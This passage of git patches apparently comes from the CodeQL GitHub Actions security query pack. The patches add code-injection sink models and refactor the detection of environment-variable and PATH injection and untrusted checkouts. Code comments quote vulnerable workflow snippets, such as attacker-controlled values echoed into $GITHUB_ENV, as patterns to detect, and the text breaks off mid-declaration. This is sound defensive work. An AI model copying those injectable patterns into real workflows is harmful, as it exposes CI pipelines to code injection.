=?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 27 Jun 2024 17:26:04 +0200 Subject: [PATCH 361/707] New code injection sink --- ql/lib/ext/manual/mikefarah_yq.model.yml | 7 +++++++ 1 file changed, 7 insertions(+) create mode 100644 ql/lib/ext/manual/mikefarah_yq.model.yml diff --git a/ql/lib/ext/manual/mikefarah_yq.model.yml b/ql/lib/ext/manual/mikefarah_yq.model.yml new file mode 100644 index 000000000000..35aecbdd9681 --- /dev/null +++ b/ql/lib/ext/manual/mikefarah_yq.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSinkModel + data: + - ["mikefarah/yq", "*", "input.cmd", "code-injection", "manual"] + From 31fe5952dc61f9cbbb59b2036c6ca8fff9b7616c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 27 Jun 2024 17:32:03 +0200 Subject: [PATCH 362/707] New poisonable steps --- ql/lib/ext/config/poisonable_steps.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml index 9ad251007e57..11f17ae26239 100644 --- a/ql/lib/ext/config/poisonable_steps.yml +++ b/ql/lib/ext/config/poisonable_steps.yml @@ -10,6 +10,7 @@ extensions: - ["bridgecrewio/checkov-action"] - ["ruby/setup-ruby"] - ["actions/jekyll-build-pages"] + - ["qcastel/github-actions-maven/actions/maven"] - addsTo: pack: github/actions-all extensible: poisonableCommandsDataModel From c57e4929cb01c2c291c76ef75c58012faabc8acb Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 27 Jun 2024 17:32:21 +0200 Subject: [PATCH 363/707] New code injection sink --- ql/lib/ext/manual/devorbitus_yq-action-output.model.yml | 7 +++++++ 1 file changed, 7 insertions(+) create mode 100644 ql/lib/ext/manual/devorbitus_yq-action-output.model.yml diff --git a/ql/lib/ext/manual/devorbitus_yq-action-output.model.yml b/ql/lib/ext/manual/devorbitus_yq-action-output.model.yml new file mode 100644 index 000000000000..412db371965c --- /dev/null +++ b/ql/lib/ext/manual/devorbitus_yq-action-output.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSinkModel + data: + - ["devorbitus/yq-action-output", "*", "input.cmd", "code-injection", "manual"] + From b64f53e03e83073984e309301ffdaefbdc7db806 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 27 Jun 2024 17:33:08 +0200 Subject: [PATCH 364/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 3c37e64b8567..30120f7d321f 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.7 +version: 0.1.8 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index f7464c784529..dad05ff4af39 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.7 +version: 0.1.8 groups: [actions, queries] suites: codeql-suites extractor: javascript From effa1e135670cfdaa01a83d42a156be6ff7eff87 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 27 Jun 2024 22:53:20 +0200 Subject: [PATCH 365/707] Move ControlChecks to its own file --- .../codeql/actions/security/ControlChecks.qll | 65 +++++++++++++++++++ .../security/UntrustedCheckoutQuery.qll | 63 ------------------ .../Security/CWE-285/ImproperAccessControl.ql | 1 + .../UntrustedCheckoutTOCTOUCritical.ql | 1 + .../CWE-367/UntrustedCheckoutTOCTOUHigh.ql | 1 + .../CWE-829/UntrustedCheckoutCritical.ql | 1 + .../Security/CWE-829/UntrustedCheckoutHigh.ql | 1 + .../CWE-829/UntrustedCheckoutMedium.ql | 1 + 8 files changed, 71 insertions(+), 63 deletions(-) create mode 100644 ql/lib/codeql/actions/security/ControlChecks.qll diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll new file mode 100644 index 000000000000..fdafda1fc27a --- /dev/null +++ b/ql/lib/codeql/actions/security/ControlChecks.qll @@ -0,0 +1,65 @@ +import actions + +/** An If node that contains an actor, user or label check */ +abstract class ControlCheck extends If { + predicate dominates(Step step) { + step.getIf() = this or + step.getEnclosingJob().getIf() = this or + step.getEnclosingJob().getANeededJob().(LocalJob).getAStep().getIf() = this or + step.getEnclosingJob().getANeededJob().(LocalJob).getIf() = this + } +} + +class LabelControlCheck extends ControlCheck { + LabelControlCheck() { + // eg: contains(github.event.pull_request.labels.*.name, 'safe to test') + // eg: github.event.label.name == 'safe to test' + exists( + normalizeExpr(this.getCondition()) + .regexpFind([ + "\\bgithub\\.event\\.pull_request\\.labels\\b", "\\bgithub\\.event\\.label\\.name\\b" + ], _, _) + ) + } +} + +class ActorControlCheck extends ControlCheck { + ActorControlCheck() { + // eg: github.actor == 'dependabot[bot]' + // eg: github.triggering_actor == 'CI Agent' + // eg: github.event.pull_request.user.login == 'mybot' + exists( + normalizeExpr(this.getCondition()) + .regexpFind([ + "\\bgithub\\.actor\\b", "\\bgithub\\.triggering_actor\\b", + "\\bgithub\\.event\\.comment\\.user\\.login\\b", + "\\bgithub\\.event\\.pull_request\\.user\\.login\\b", + ], _, _) + ) + } +} + +class RepositoryControlCheck extends ControlCheck { + RepositoryControlCheck() { + // eg: github.repository == 'test/foo' + exists( + normalizeExpr(this.getCondition()) + .regexpFind(["\\bgithub\\.repository\\b", "\\bgithub\\.repository_owner\\b",], _, _) + ) + } +} + +class AssociationControlCheck extends ControlCheck { + AssociationControlCheck() { + // eg: contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) + exists( + normalizeExpr(this.getCondition()) + .regexpFind([ + "\\bgithub\\.event\\.comment\\.author_association\\b", + "\\bgithub\\.event\\.issue\\.author_association\\b", + "\\bgithub\\.event\\.pull_request\\.author_association\\b", + ], _, _) + ) + } +} + diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index 90b0a74d0ece..fcccc5d8a14a 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -233,66 +233,3 @@ class GhSHACheckout extends SHACheckoutStep instanceof Run { ) } } - -/** An If node that contains an actor, user or label check */ -abstract class ControlCheck extends If { - predicate dominates(Step step) { - step.getIf() = this or - step.getEnclosingJob().getIf() = this or - step.getEnclosingJob().getANeededJob().(LocalJob).getAStep().getIf() = this or - step.getEnclosingJob().getANeededJob().(LocalJob).getIf() = this - } -} - -class LabelControlCheck extends ControlCheck { - LabelControlCheck() { - // eg: contains(github.event.pull_request.labels.*.name, 'safe to test') - // eg: github.event.label.name == 'safe to test' - exists( - normalizeExpr(this.getCondition()) - .regexpFind([ - "\\bgithub\\.event\\.pull_request\\.labels\\b", "\\bgithub\\.event\\.label\\.name\\b" - ], _, _) - ) - } -} - -class ActorControlCheck extends ControlCheck { - ActorControlCheck() { - // eg: github.actor == 'dependabot[bot]' - // eg: github.triggering_actor == 'CI Agent' - // eg: github.event.pull_request.user.login == 'mybot' - exists( - normalizeExpr(this.getCondition()) - .regexpFind([ - "\\bgithub\\.actor\\b", "\\bgithub\\.triggering_actor\\b", - "\\bgithub\\.event\\.comment\\.user\\.login\\b", - "\\bgithub\\.event\\.pull_request\\.user\\.login\\b", - ], _, _) - ) - } -} - -class RepositoryControlCheck extends ControlCheck { - RepositoryControlCheck() { - // eg: github.repository == 'test/foo' - exists( - normalizeExpr(this.getCondition()) - .regexpFind(["\\bgithub\\.repository\\b", "\\bgithub\\.repository_owner\\b",], _, _) - ) - } -} - -class AssociationControlCheck extends ControlCheck { - AssociationControlCheck() { - // eg: contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) - exists( - normalizeExpr(this.getCondition()) - .regexpFind([ - "\\bgithub\\.event\\.comment\\.author_association\\b", - "\\bgithub\\.event\\.issue\\.author_association\\b", - "\\bgithub\\.event\\.pull_request\\.author_association\\b", - ], _, _) - ) - } -} diff --git a/ql/src/Security/CWE-285/ImproperAccessControl.ql b/ql/src/Security/CWE-285/ImproperAccessControl.ql index 88ac3cee04db..16ae5c5fe9b5 100644 --- a/ql/src/Security/CWE-285/ImproperAccessControl.ql +++ b/ql/src/Security/CWE-285/ImproperAccessControl.ql @@ -12,6 +12,7 @@ */ import codeql.actions.security.UntrustedCheckoutQuery +import codeql.actions.security.ControlChecks from LocalJob job, LabelControlCheck check, MutableRefCheckoutStep checkout, Event event where diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql index ff9148ab5833..3a049f67dea7 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql @@ -14,6 +14,7 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps +import codeql.actions.security.ControlChecks from ControlCheck check, MutableRefCheckoutStep checkout where diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql index ca1b855c6ece..b9a1e4c6301a 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql @@ -14,6 +14,7 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps +import codeql.actions.security.ControlChecks from ControlCheck check, MutableRefCheckoutStep checkout where diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql index 9f7f3fd8ceef..3a87b30be970 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql @@ -16,6 +16,7 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps +import codeql.actions.security.ControlChecks query predicate edges(Step a, Step b) { a.getAFollowingStep() = b } diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql index 980560dac9a3..cb2f1cdaf95f 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql @@ -16,6 +16,7 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps +import codeql.actions.security.ControlChecks from LocalJob j, PRHeadCheckoutStep checkout where diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql b/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql index 89d2e7413067..3edde8dcf547 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql @@ -16,6 +16,7 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps +import codeql.actions.security.ControlChecks from LocalJob j, PRHeadCheckoutStep checkout where From a9ea9a1f8a7e781e072de04ab682db08111daa6a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 27 Jun 2024 22:53:32 +0200 Subject: [PATCH 366/707] Update expected test files --- .../Security/CWE-829/UntrustedCheckoutCritical.expected | 1 + 1 file changed, 1 insertion(+) diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 57efc8af35dc..5f4ba7a7b98f 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -313,6 +313,7 @@ edges | .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | #select | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | +| .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | From 40a6f3bbee8348d2b2f0e66b510236bcd91b1ec7 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 27 Jun 2024 22:53:55 +0200 Subject: [PATCH 367/707] Make EnvVar and Path injection equivalent --- .../security/EnvPathInjectionQuery.qll | 5 ++- .../actions/security/EnvVarInjectionQuery.qll | 39 ++++++++++++------- 2 files changed, 29 insertions(+), 15 deletions(-) diff --git a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll index cd049cccf4ed..453966f01017 100644 --- a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll @@ -15,7 +15,8 @@ class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { writeToGitHubPath(run, value) and // (eg: echo DATABASE_SHA=`yq '.creationMetadata.sha' codeql-database.yml` >> $GITHUB_ENV) value - .regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<", "jq\\s+", "yq\\s+"] + ".*" + ["`", "\\)"]) + .regexpMatch(["\\$\\(", "`"] + + ["cat\\s+", "<", "jq\\s+", "yq\\s+", "tail\\s+", "head\\s+"] + ".*" + ["`", "\\)"]) ) } } @@ -31,7 +32,7 @@ class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { class EnvPathInjectionFromEnvVarSink extends EnvPathInjectionSink { EnvPathInjectionFromEnvVarSink() { exists(Run run, Expression expr, string var_name, string value | - this.asExpr().getInScopeEnvVarExpr(var_name) = expr and + run.getInScopeEnvVarExpr(var_name) = expr and run.getScriptScalar() = this.asExpr() and writeToGitHubPath(run, value) and ( diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index a692c6e58741..a78963086e1a 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -7,18 +7,6 @@ import codeql.actions.DataFlow abstract class EnvVarInjectionSink extends DataFlow::Node { } -class EnvVarInjectionFromEnvVarSink extends EnvVarInjectionSink { - EnvVarInjectionFromEnvVarSink() { - exists(Run run, Expression expr, string var_name, string content, string value | - expr = run.getInScopeEnvVarExpr(var_name) and - writeToGitHubEnv(run, content) and - extractVariableAndValue(content, _, value) and - run.getScriptScalar() = this.asExpr() and - value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") - ) - } -} - class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { EnvVarInjectionFromFileReadSink() { exists(Run run, UntrustedArtifactDownloadStep step, string content, string value | @@ -28,7 +16,32 @@ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { extractVariableAndValue(content, _, value) and // (eg: echo DATABASE_SHA=`yq '.creationMetadata.sha' codeql-database.yml` >> $GITHUB_ENV) value - .regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<", "jq\\s+", "yq\\s+"] + ".*" + ["`", "\\)"]) + .regexpMatch(["\\$\\(", "`"] + + ["cat\\s+", "<", "jq\\s+", "yq\\s+", "tail\\s+", "head\\s+"] + ".*" + ["`", "\\)"]) + ) + } +} + +/** + * Holds if a Run step declares an environment variable, uses it to declare env var. + * e.g. + * env: + * BODY: ${{ github.event.comment.body }} + * run: | + * echo "FOO=$BODY" >> $GITHUB_ENV + */ +class EnvVarInjectionFromEnvVarSink extends EnvVarInjectionSink { + EnvVarInjectionFromEnvVarSink() { + exists(Run run, Expression expr, string var_name, string content, string value | + run.getInScopeEnvVarExpr(var_name) = expr and + run.getScriptScalar() = this.asExpr() and + writeToGitHubEnv(run, content) and + extractVariableAndValue(content, _, value) and + ( + value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") + or + value.matches("$(echo %") and value.indexOf(var_name) > 0 + ) ) } } From a485528ebe2eb2f0ca7be747f38ac559edc4fb89 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 28 Jun 2024 12:31:43 +0200 Subject: [PATCH 368/707] Refactor bash script parsing to improve coverage of env var injection --- ql/lib/codeql/actions/Helper.qll | 11 +++ ql/lib/codeql/actions/dataflow/FlowSteps.qll | 92 +++++++++++++++---- .../security/EnvPathInjectionQuery.qll | 27 +++--- .../actions/security/EnvVarInjectionQuery.qll | 29 +++--- .../actions/security/PoisonableSteps.qll | 16 ++-- ql/lib/ext/config/poisonable_steps.yml | 12 +-- .../CWE-077/.github/workflows/test6.yml | 28 ++++++ .../CWE-077/EnvVarInjectionCritical.expected | 12 +++ .../CWE-077/EnvVarInjectionMedium.expected | 9 ++ 9 files changed, 172 insertions(+), 64 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test6.yml diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index 401ba89eca77..72dc7bf16878 100644 --- a/ql/lib/codeql/actions/Helper.qll +++ b/ql/lib/codeql/actions/Helper.qll @@ -235,3 +235,14 @@ predicate inNonPrivilegedJob(AstNode node) { not j.isPrivilegedExternallyTriggerable() ) } + +bindingset[snippet] +predicate outputsPartialFileContent(string snippet) { + // e.g. + // echo FOO=`yq '.foo' foo.yml` >> $GITHUB_ENV + // echo "FOO=$(> $GITHUB_ENV + // yq '.foo' foo.yml >> $GITHUB_PATH + // cat foo.txt >> $GITHUB_PATH + snippet + .regexpMatch(["(\\$\\(|`)<.*", ".*(\\b|^|\\s+)" + ["cat\\s+", "jq\\s+", "yq\\s+", "tail\\s+", "head\\s+", "ls\\s+"] + ".*"]) +} diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 4f4d80cc11bb..caa09e9c7e28 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -23,6 +23,60 @@ class AdditionalTaintStep extends Unit { abstract predicate step(DataFlow::Node node1, DataFlow::Node node2); } +/** + * Holds if an env var is passed to a Run step and this Run step, writes its value to a special workflow file. + * - file is the name of the special workflow file: GITHUB_ENV, GITHUB_OUTPUT, GITHUB_PATH + * - var_name is the name of the env var + * - run is the Run step + * - key is the name assigned in the special workflow file. + * e.g. FOO for `echo "FOO=$BODY" >> $GITHUB_ENV` + * e.g. FOO for `echo "FOO=$(echo $BODY)" >> $GITHUB_OUTPUT` + * e.g. path (special name) for `echo "$BODY" >> $GITHUB_PATH` + */ +bindingset[var_name] +predicate envToRunFlow(string file, string var_name, Run run, string key) { + exists(string content, string value | + ( + file = "GITHUB_ENV" and + writeToGitHubEnv(run, content) and + extractVariableAndValue(content, key, value) + or + file = "GITHUB_OUTPUT" and + writeToGitHubOutput(run, content) and + extractVariableAndValue(content, key, value) + or + file = "GITHUB_PATH" and + writeToGitHubPath(run, content) and + key = "path" and + value = content + ) and + ( + // e.g. echo "FOO=$BODY" >> $GITHUB_ENV + // e.g. echo "FOO=${BODY}" >> $GITHUB_ENV + value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") + or + // e.g. echo "FOO=$(echo $BODY)" >> $GITHUB_ENV + value.matches("$(echo %") and value.indexOf(var_name) > 0 + or + // e.g. + // FOO=$(echo $BODY) + // echo "FOO=$FOO" >> $GITHUB_ENV + exists(string line, string var2_name, string var2_value | + run.getScript().splitAt("\n") = line + | + var2_name = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 1) and + var2_value = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 2) and + var2_value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") and + ( + value.matches("%$" + ["", "{", "ENV{"] + var2_name + "%") + or + value.matches("$(echo %") and value.indexOf(var2_name) > 0 + ) + ) + ) + ) +} + /** * Holds if a Run step declares an environment variable, uses it in its script to set another env var. * e.g. @@ -32,20 +86,10 @@ class AdditionalTaintStep extends Unit { * echo "foo=$(echo $BODY)" >> $GITHUB_ENV */ predicate envToRunStep(DataFlow::Node pred, DataFlow::Node succ) { - exists(Run run, string var_name, string content, string value | + exists(Run run, string var_name | run.getInScopeEnvVarExpr(var_name) = pred.asExpr() and - succ.asExpr() = run.getScriptScalar() - | - ( - writeToGitHubEnv(run, content) or - writeToGitHubOutput(run, content) - ) and - extractVariableAndValue(content, _, value) and - value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") - or - writeToGitHubPath(run, content) and - value = content and - value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") + succ.asExpr() = run.getScriptScalar() and + envToRunFlow(["GITHUB_ENV", "GITHUB_PATH"], var_name, run, _) ) } @@ -63,16 +107,26 @@ predicate envToRunStep(DataFlow::Node pred, DataFlow::Node succ) { * echo "::set-output name=step-output::$BODY" */ predicate envToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { - exists(Run run, string var_name, string content, string key, string value | - writeToGitHubOutput(run, content) and - extractVariableAndValue(content, key, value) and - c = any(DataFlow::FieldContent ct | ct.getName() = key) and - pred.asExpr() = run.getInScopeEnvVarExpr(var_name) and + exists(Run run, string var_name, string key | + run.getInScopeEnvVarExpr(var_name) = pred.asExpr() and succ.asExpr() = run and - value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") + envToRunFlow("GITHUB_OUTPUT", var_name, run, key) and + c = any(DataFlow::FieldContent ct | ct.getName() = key) ) } +// predicate dISABLEDenvToOutputStoreStep( +// DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c +// ) { +// exists(Run run, string var_name, string content, string key, string value | +// writeToGitHubOutput(run, content) and +// extractVariableAndValue(content, key, value) and +// c = any(DataFlow::FieldContent ct | ct.getName() = key) and +// pred.asExpr() = run.getInScopeEnvVarExpr(var_name) and +// succ.asExpr() = run and +// value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") +// ) +// } predicate envToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { exists(Run run, string var_name, string content, string key, string value | writeToGitHubEnv(run, content) and diff --git a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll index 453966f01017..cbdf9a917ce9 100644 --- a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll @@ -1,22 +1,26 @@ private import actions private import codeql.actions.TaintTracking private import codeql.actions.dataflow.ExternalFlow -import codeql.actions.dataflow.FlowSources private import codeql.actions.security.ArtifactPoisoningQuery +private import codeql.actions.dataflow.FlowSteps import codeql.actions.DataFlow +import codeql.actions.dataflow.FlowSources abstract class EnvPathInjectionSink extends DataFlow::Node { } +/** + * Holds if a Run step declares a PATH environment variable with contents from a local file. + * e.g. + * run: | + * cat foo.txt >> $GITHUB_PATH + */ class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { EnvPathInjectionFromFileReadSink() { exists(Run run, UntrustedArtifactDownloadStep step, string value | this.asExpr() = run.getScriptScalar() and step.getAFollowingStep() = run and writeToGitHubPath(run, value) and - // (eg: echo DATABASE_SHA=`yq '.creationMetadata.sha' codeql-database.yml` >> $GITHUB_ENV) - value - .regexpMatch(["\\$\\(", "`"] + - ["cat\\s+", "<", "jq\\s+", "yq\\s+", "tail\\s+", "head\\s+"] + ".*" + ["`", "\\)"]) + outputsPartialFileContent(value) ) } } @@ -31,15 +35,10 @@ class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { */ class EnvPathInjectionFromEnvVarSink extends EnvPathInjectionSink { EnvPathInjectionFromEnvVarSink() { - exists(Run run, Expression expr, string var_name, string value | - run.getInScopeEnvVarExpr(var_name) = expr and - run.getScriptScalar() = this.asExpr() and - writeToGitHubPath(run, value) and - ( - value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") - or - value.matches("$(echo %") and value.indexOf(var_name) > 0 - ) + exists(Run run, string var_name | + envToRunFlow("GITHUB_PATH", var_name, run, _) and + exists(run.getInScopeEnvVarExpr(var_name)) and + run.getScriptScalar() = this.asExpr() ) } } diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index a78963086e1a..5a3dbebc5123 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -1,12 +1,20 @@ private import actions private import codeql.actions.TaintTracking private import codeql.actions.dataflow.ExternalFlow -import codeql.actions.dataflow.FlowSources private import codeql.actions.security.ArtifactPoisoningQuery +private import codeql.actions.dataflow.FlowSteps import codeql.actions.DataFlow +import codeql.actions.dataflow.FlowSources abstract class EnvVarInjectionSink extends DataFlow::Node { } +/** + * Holds if a Run step declares an environment variable with contents from a local file. + * e.g. + * run: | + * echo "sha=$(cat test-results/sha-number)" >> $GITHUB_ENV + * echo "sha=$(> $GITHUB_ENV + */ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { EnvVarInjectionFromFileReadSink() { exists(Run run, UntrustedArtifactDownloadStep step, string content, string value | @@ -14,10 +22,7 @@ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { step.getAFollowingStep() = run and writeToGitHubEnv(run, content) and extractVariableAndValue(content, _, value) and - // (eg: echo DATABASE_SHA=`yq '.creationMetadata.sha' codeql-database.yml` >> $GITHUB_ENV) - value - .regexpMatch(["\\$\\(", "`"] + - ["cat\\s+", "<", "jq\\s+", "yq\\s+", "tail\\s+", "head\\s+"] + ".*" + ["`", "\\)"]) + outputsPartialFileContent(value) ) } } @@ -32,16 +37,10 @@ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { */ class EnvVarInjectionFromEnvVarSink extends EnvVarInjectionSink { EnvVarInjectionFromEnvVarSink() { - exists(Run run, Expression expr, string var_name, string content, string value | - run.getInScopeEnvVarExpr(var_name) = expr and - run.getScriptScalar() = this.asExpr() and - writeToGitHubEnv(run, content) and - extractVariableAndValue(content, _, value) and - ( - value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") - or - value.matches("$(echo %") and value.indexOf(var_name) > 0 - ) + exists(Run run, string var_name | + envToRunFlow("GITHUB_ENV", var_name, run, _) and + exists(run.getInScopeEnvVarExpr(var_name)) and + run.getScriptScalar() = this.asExpr() ) } } diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index d9978b2a4239..4165df17a4d8 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll @@ -18,7 +18,7 @@ class PoisonableCommandStep extends PoisonableStep, Run { PoisonableCommandStep() { exists(string regexp | poisonableCommandsDataModel(regexp) and - exists(this.getScript().splitAt("\n").trim().regexpFind("([^a-z]|^)" + regexp, _, _)) + exists(this.getScript().splitAt("\n").trim().regexpFind("(^|\\b|\\s+)" + regexp, _, _)) ) } } @@ -29,7 +29,7 @@ class LocalScriptExecutionRunStep extends PoisonableStep, Run { LocalScriptExecutionRunStep() { exists(string line, string regexp, int group | line = this.getScript().splitAt("\n").trim() | poisonableLocalScriptsDataModel(regexp, group) and - cmd = line.regexpCapture(regexp, group) + cmd = line.regexpCapture("(^|\\b|\\s+)" + regexp, group) ) } @@ -40,16 +40,12 @@ class LocalActionUsesStep extends PoisonableStep, UsesStep { LocalActionUsesStep() { this.getCallee().matches("./%") } } -class EnvVarInjectionRunStep extends PoisonableStep, Run { - EnvVarInjectionRunStep() { - exists(string content, string value | - // Heuristic: - // Run step with env var definition based on file content. - // eg: `echo "sha=$(cat test-results/sha-number)" >> $GITHUB_ENV` - // eg: `echo "sha=$(> $GITHUB_ENV` +class 